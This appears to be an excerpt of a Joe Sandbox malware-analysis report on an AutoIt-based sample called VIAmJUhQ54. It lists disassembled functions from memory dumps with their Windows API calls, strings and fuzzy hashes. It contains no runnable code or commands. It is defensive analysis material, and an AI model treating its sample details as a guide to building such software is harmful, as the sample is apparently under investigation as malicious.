                                                                                • API String ID: 1539411459-0
                                                                                • Opcode ID: 7cf1ce15e0b198705c353c799d9f76e204d35d50b5be3de08ff76a27cf28e5ce
                                                                                • Instruction ID: 9504382068d03ad2d6b775dc6dff0138412ddfa2034b89050ca9754d233a7990
                                                                                • Opcode Fuzzy Hash: 7cf1ce15e0b198705c353c799d9f76e204d35d50b5be3de08ff76a27cf28e5ce
                                                                                • Instruction Fuzzy Hash: E6F05431046159BBDB226F54AC0EFCA3F196F4A711F04C101FA12650E1877D9A51CB99
                                                                                APIs
                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0075C84A
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 0075C85D
                                                                                • GetCurrentThreadId.KERNEL32 ref: 0075C864
                                                                                • AttachThreadInput.USER32(00000000), ref: 0075C86B
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                • String ID:
                                                                                • API String ID: 2710830443-0
                                                                                • Opcode ID: e61c4ed4a35d7c25861d69109332517632431f8df80807fd10a39ad752e4465c
                                                                                • Instruction ID: 979a0212e7f4bb5fff35cb878ad15bbe9ac171ab67448aab87a87350c3dbd470
                                                                                • Opcode Fuzzy Hash: e61c4ed4a35d7c25861d69109332517632431f8df80807fd10a39ad752e4465c
                                                                                • Instruction Fuzzy Hash: 81E03971141228BADB211BA2DC0DFDB7F5CEF467A2F008021BA0A84860C6B99984CBE0
                                                                                APIs
                                                                                • GetCurrentThread.KERNEL32 ref: 0075B0D6
                                                                                • OpenThreadToken.ADVAPI32(00000000,?,?,?,0075AC9D), ref: 0075B0DD
                                                                                • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,0075AC9D), ref: 0075B0EA
                                                                                • OpenProcessToken.ADVAPI32(00000000,?,?,?,0075AC9D), ref: 0075B0F1
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentOpenProcessThreadToken
                                                                                • String ID:
                                                                                • API String ID: 3974789173-0
                                                                                • Opcode ID: 3612a6330caa4d2b85dbc4d3d68205eb4eea8a716ce8fa925a35b4753513db29
                                                                                • Instruction ID: b0781b0b6db891f0ef884ce56b4600f894a442df18214fefe31efaffe36dbad2
                                                                                • Opcode Fuzzy Hash: 3612a6330caa4d2b85dbc4d3d68205eb4eea8a716ce8fa925a35b4753513db29
                                                                                • Instruction Fuzzy Hash: ADE04F72601211ABD7301FB19D0DB973BA8AF96792F02C818A646D6080DA6C98068764
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 0073B496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 0073B4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 0073B4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 0073B4BD
                                                                                • GetWindowDC.USER32(?,00000000), ref: 0079DE2B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0079DE38
                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 0079DE51
                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 0079DE6A
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0079DE8A
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0079DE95
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 1946975507-0
                                                                                • Opcode ID: 40da31775441e5f78b9a10362d7e118be24b08873d2a0f9560a6b0f6cb981d90
                                                                                • Instruction ID: f077d9d02b61c38bfd28f0b7cd637b270f5aef8264d66b76c5d7d9b63feb3d53
                                                                                • Opcode Fuzzy Hash: 40da31775441e5f78b9a10362d7e118be24b08873d2a0f9560a6b0f6cb981d90
                                                                                • Instruction Fuzzy Hash: 91E06D31500244AEEF311F64FC0DBD83B11AB92335F00C226F66A580E2D3794D81CB11
                                                                                APIs
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0075B2DF
                                                                                • UnloadUserProfile.USERENV(?,?), ref: 0075B2EB
                                                                                • CloseHandle.KERNEL32(?), ref: 0075B2F4
                                                                                • CloseHandle.KERNEL32(?), ref: 0075B2FC
                                                                                  • Part of subcall function 0075AB24: GetProcessHeap.KERNEL32(00000000,?,0075A848), ref: 0075AB2B
                                                                                  • Part of subcall function 0075AB24: HeapFree.KERNEL32(00000000), ref: 0075AB32
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                • String ID:
                                                                                • API String ID: 146765662-0
                                                                                • Opcode ID: ebe77019acebd60f820a1e53fe016675a39088bfafec602a7270016edfb4b539
                                                                                • Instruction ID: c9cd57f0c2c011734171773b3b347163ee3c94fcb1000a2db1f190d584cb13be
                                                                                • Opcode Fuzzy Hash: ebe77019acebd60f820a1e53fe016675a39088bfafec602a7270016edfb4b539
                                                                                • Instruction Fuzzy Hash: 11E0BF7A104005FBCB112B95DC08859FB66FFC9321710C221F61681971CB769871EB95
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: 8dccc74d278b0173dc1e067ecf452752197e0248147359618d2d10b6f118a44e
                                                                                • Instruction ID: 54fe78f2f7f8ba55c2cfa03ec3968cada23ae75eafe19a7a955dbb2d25fb7456
                                                                                • Opcode Fuzzy Hash: 8dccc74d278b0173dc1e067ecf452752197e0248147359618d2d10b6f118a44e
                                                                                • Instruction Fuzzy Hash: D3E01AB1500204EFEB105F70984862E7BA9EB8C390F12C805F85B87611DB7C9C418B54
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                • String ID:
                                                                                • API String ID: 2889604237-0
                                                                                • Opcode ID: d5fa3f251ec2b56c9f6b170676f509a41f4c13cbc396709b70ce41def4aa1f5f
                                                                                • Instruction ID: 865ddc0cc6fd7fee5d4305d605f8d63c057f37be87a964e55dfabdb127868ec0
                                                                                • Opcode Fuzzy Hash: d5fa3f251ec2b56c9f6b170676f509a41f4c13cbc396709b70ce41def4aa1f5f
                                                                                • Instruction Fuzzy Hash: F8E046B1500204EFEB205F70D84C62D7BA9EB8D390F12C809F95B8B612DB7CAC018B18
                                                                                APIs
                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 0075DEAA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: ContainedObject
                                                                                • String ID: AutoIt3GUI$Container
                                                                                • API String ID: 3565006973-3941886329
                                                                                • Opcode ID: 14074ee6a3b9b43e68b8cc994965933adb18c61f8af63b1fbd3b5e05da67c757
                                                                                • Instruction ID: 85ec08b9739ffbe6ad46a2c95abc23424d4eb242aec39c0a3ba488844777c472
                                                                                • Opcode Fuzzy Hash: 14074ee6a3b9b43e68b8cc994965933adb18c61f8af63b1fbd3b5e05da67c757
                                                                                • Instruction Fuzzy Hash: F1913670600701AFDB24CF64C888BAAB7B5BF49711F10856EF85ACB691DBB4ED45CB60
                                                                                APIs
                                                                                  • Part of subcall function 0073C6F4: _wcscpy.LIBCMT ref: 0073C717
                                                                                  • Part of subcall function 0072936C: __swprintf.LIBCMT ref: 007293AB
                                                                                  • Part of subcall function 0072936C: __itow.LIBCMT ref: 007293DF
                                                                                • __wcsnicmp.LIBCMT ref: 0076DEFD
                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 0076DFC6
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                                                                                • String ID: LPT
                                                                                • API String ID: 3222508074-1350329615
                                                                                • Opcode ID: 00431d8debad7bfaf7d9cf2f8f22baad16290cd109c14b99496d465508b9f100
                                                                                • Instruction ID: a76afea47e2981620c159d4eae060eff7fd4d061f0848e54b50770e616d74b21
                                                                                • Opcode Fuzzy Hash: 00431d8debad7bfaf7d9cf2f8f22baad16290cd109c14b99496d465508b9f100
                                                                                • Instruction Fuzzy Hash: B961AF75A00215EFCB14DF98C885EEEB7B4AF08310F154069F947AB291DB78AE44CBA4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy
                                                                                • String ID: I/y$I/y
                                                                                • API String ID: 3048848545-622437722
                                                                                • Opcode ID: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                • Instruction ID: cacf5a774535db082a03b6df6f587de39f2d4572c521a28206b5d90a1fcc49c1
                                                                                • Opcode Fuzzy Hash: 88dfdb524e9d45900ed7a20722aa58de949687d2b7979f4fca71de7ff0cb1198
                                                                                • Instruction Fuzzy Hash: A741C235900A16EACF65EF98D4459FDB770EF58310F50904AED82B7192DB786E83C7A0
                                                                                APIs
                                                                                • Sleep.KERNEL32(00000000), ref: 0073BCDA
                                                                                • GlobalMemoryStatusEx.KERNEL32 ref: 0073BCF3
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: GlobalMemorySleepStatus
                                                                                • String ID: @
                                                                                • API String ID: 2783356886-2766056989
                                                                                • Opcode ID: 07ebc6d25969cf5eb5fc9a8e81b557cfc47e73def9346ca85c583d1caf447817
                                                                                • Instruction ID: c0698bc5b6551f0114ac0acca1b179c10588a8e70b4b4ce689ea9e99bb5e6a07
                                                                                • Opcode Fuzzy Hash: 07ebc6d25969cf5eb5fc9a8e81b557cfc47e73def9346ca85c583d1caf447817
                                                                                • Instruction Fuzzy Hash: CE514A71408748DBE320AF14DC89BAFBBE8FF94354F41884EF1C8410A3DB75956A8766
                                                                                APIs
                                                                                  • Part of subcall function 007244ED: __fread_nolock.LIBCMT ref: 0072450B
                                                                                • _wcscmp.LIBCMT ref: 0076C65D
                                                                                • _wcscmp.LIBCMT ref: 0076C670
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscmp$__fread_nolock
                                                                                • String ID: FILE
                                                                                • API String ID: 4029003684-3121273764
                                                                                • Opcode ID: e389f7d05691b31619237a902499cc0620a5a0d52a9cc351dad7885272b2a4e1
                                                                                • Instruction ID: 1d25198c3b54492f21cc9f54fa2943e0506a2a7b8a9f5747b4e1abc19bdb6c6f
                                                                                • Opcode Fuzzy Hash: e389f7d05691b31619237a902499cc0620a5a0d52a9cc351dad7885272b2a4e1
                                                                                • Instruction Fuzzy Hash: 73410972A0025ABBDF11ABA4DC45FEF77B9EF49704F000069FA06E7181D778AA04CB65
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00001132,00000000,?), ref: 0078A85A
                                                                                • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0078A86F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: '
                                                                                • API String ID: 3850602802-1997036262
                                                                                • Opcode ID: c809c0c8b997e2c207318c6571e8a8dd1ad7172b643fe5ef5740a42abcb4b475
                                                                                • Instruction ID: 8f8a11f44a6035e3a2c12be76a40849a49dea1ef02a9ede2c28732b6da769c69
                                                                                • Opcode Fuzzy Hash: c809c0c8b997e2c207318c6571e8a8dd1ad7172b643fe5ef5740a42abcb4b475
                                                                                • Instruction Fuzzy Hash: 5541F874E41309AFEB14DF68D881BDA7BB9FB08310F14406AE905AB341D774A941DFA1
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?,?,?), ref: 0078980E
                                                                                • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0078984A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$DestroyMove
                                                                                • String ID: static
                                                                                • API String ID: 2139405536-2160076837
                                                                                • Opcode ID: ba94b9dfa33057a45d2a94edf349333869c3f0ebce15ec33eb0be44c5dfa8f80
                                                                                • Instruction ID: 6a7d73863340c2b13e1f3a13794e14c66491f17d3e8c84ed8c3cf5f16a0d1cef
                                                                                • Opcode Fuzzy Hash: ba94b9dfa33057a45d2a94edf349333869c3f0ebce15ec33eb0be44c5dfa8f80
                                                                                • Instruction Fuzzy Hash: 96318B71150604EAEB10AF74CC80BFB73A9FF99760F048619F9A9C7191CB39AC81C764
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 007651C6
                                                                                • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00765201
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: InfoItemMenu_memset
                                                                                • String ID: 0
                                                                                • API String ID: 2223754486-4108050209
                                                                                • Opcode ID: 77874422c5773dbe88d2316a99a55f594636114ee3f554f1f02582fa2fca4e05
                                                                                • Instruction ID: 3ca705b7204bb28dca40a293b65d8824b65410c8468899d0727f45fcbf78aea8
                                                                                • Opcode Fuzzy Hash: 77874422c5773dbe88d2316a99a55f594636114ee3f554f1f02582fa2fca4e05
                                                                                • Instruction Fuzzy Hash: A231F8B1A00704DFEB24CF99D855B9EBBF4FF45350F144019ED87A61A0D7789944EB10
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: __snwprintf
                                                                                • String ID: , $$AUTOITCALLVARIABLE%d
                                                                                • API String ID: 2391506597-2584243854
                                                                                • Opcode ID: e77c0a0106181e1a1f6eef5765a483bc712f0ec71cd1a727a3c90377f8adfa0a
                                                                                • Instruction ID: 0ee6294c55a2e0efd8591667ad764ac95fe8fe4422cb61636f853007e47f2772
                                                                                • Opcode Fuzzy Hash: e77c0a0106181e1a1f6eef5765a483bc712f0ec71cd1a727a3c90377f8adfa0a
                                                                                • Instruction Fuzzy Hash: 29218E71A00528EBCF10EF64D886EAD77B4AF44740F404469F405EB185DB78EA55CBA2
                                                                                APIs
                                                                                • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0078945C
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00789467
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend
                                                                                • String ID: Combobox
                                                                                • API String ID: 3850602802-2096851135
                                                                                • Opcode ID: 82a79b60fafa04787a3b4845d78847acbef425569db0f7c9aaf574d0619882c0
                                                                                • Instruction ID: f304b7b5dad3803fcac7b3544c956d9bcc7d1ef385bc1304008f02fc00608972
                                                                                • Opcode Fuzzy Hash: 82a79b60fafa04787a3b4845d78847acbef425569db0f7c9aaf574d0619882c0
                                                                                • Instruction Fuzzy Hash: 8111B2B1340249BFEF21AE54DC80EBB376EEB883A4F144125FA1997290D6399C528B60
                                                                                APIs
                                                                                  • Part of subcall function 0073B34E: GetWindowLongW.USER32(?,000000EB), ref: 0073B35F
                                                                                • GetActiveWindow.USER32 ref: 0078DA7B
                                                                                • EnumChildWindows.USER32(?,0078D75F,00000000), ref: 0078DAF5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.1288510667.0000000000721000.00000020.00000001.01000000.00000003.sdmp, Offset: 00720000, based on PE: true
                                                                                • Associated: 00000001.00000002.1288275823.0000000000720000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288572865.00000000007CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288626390.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000001.00000002.1288656746.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_1_2_720000_VIAmJUhQ54.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ActiveChildEnumLongWindows
                                                                                • String ID: T1w
                                                                                • API String ID: 3814560230-2630401107
                                                                                • Opcode ID: 1916832c5a91e88b70c442897196dbe6d5723d8b68c1bcb1629a3985ab62db0c
                                                                                • Instruction ID: 92b7d5df2f1bd8cd7181682bc25d623220113712152fa4fb7145d6b7a82d5e8b
                                                                                • Opcode Fuzzy Hash: 1916832c5a91e88b70c442897196dbe6d5723d8b68c1bcb1629a3985ab62db0c
                                                                                • Instruction Fuzzy Hash: 35217C75205240DFC724EF68D881AA677F5EF89320F654618F96A8B3E0DB38AC40CF64
                                                                                APIs
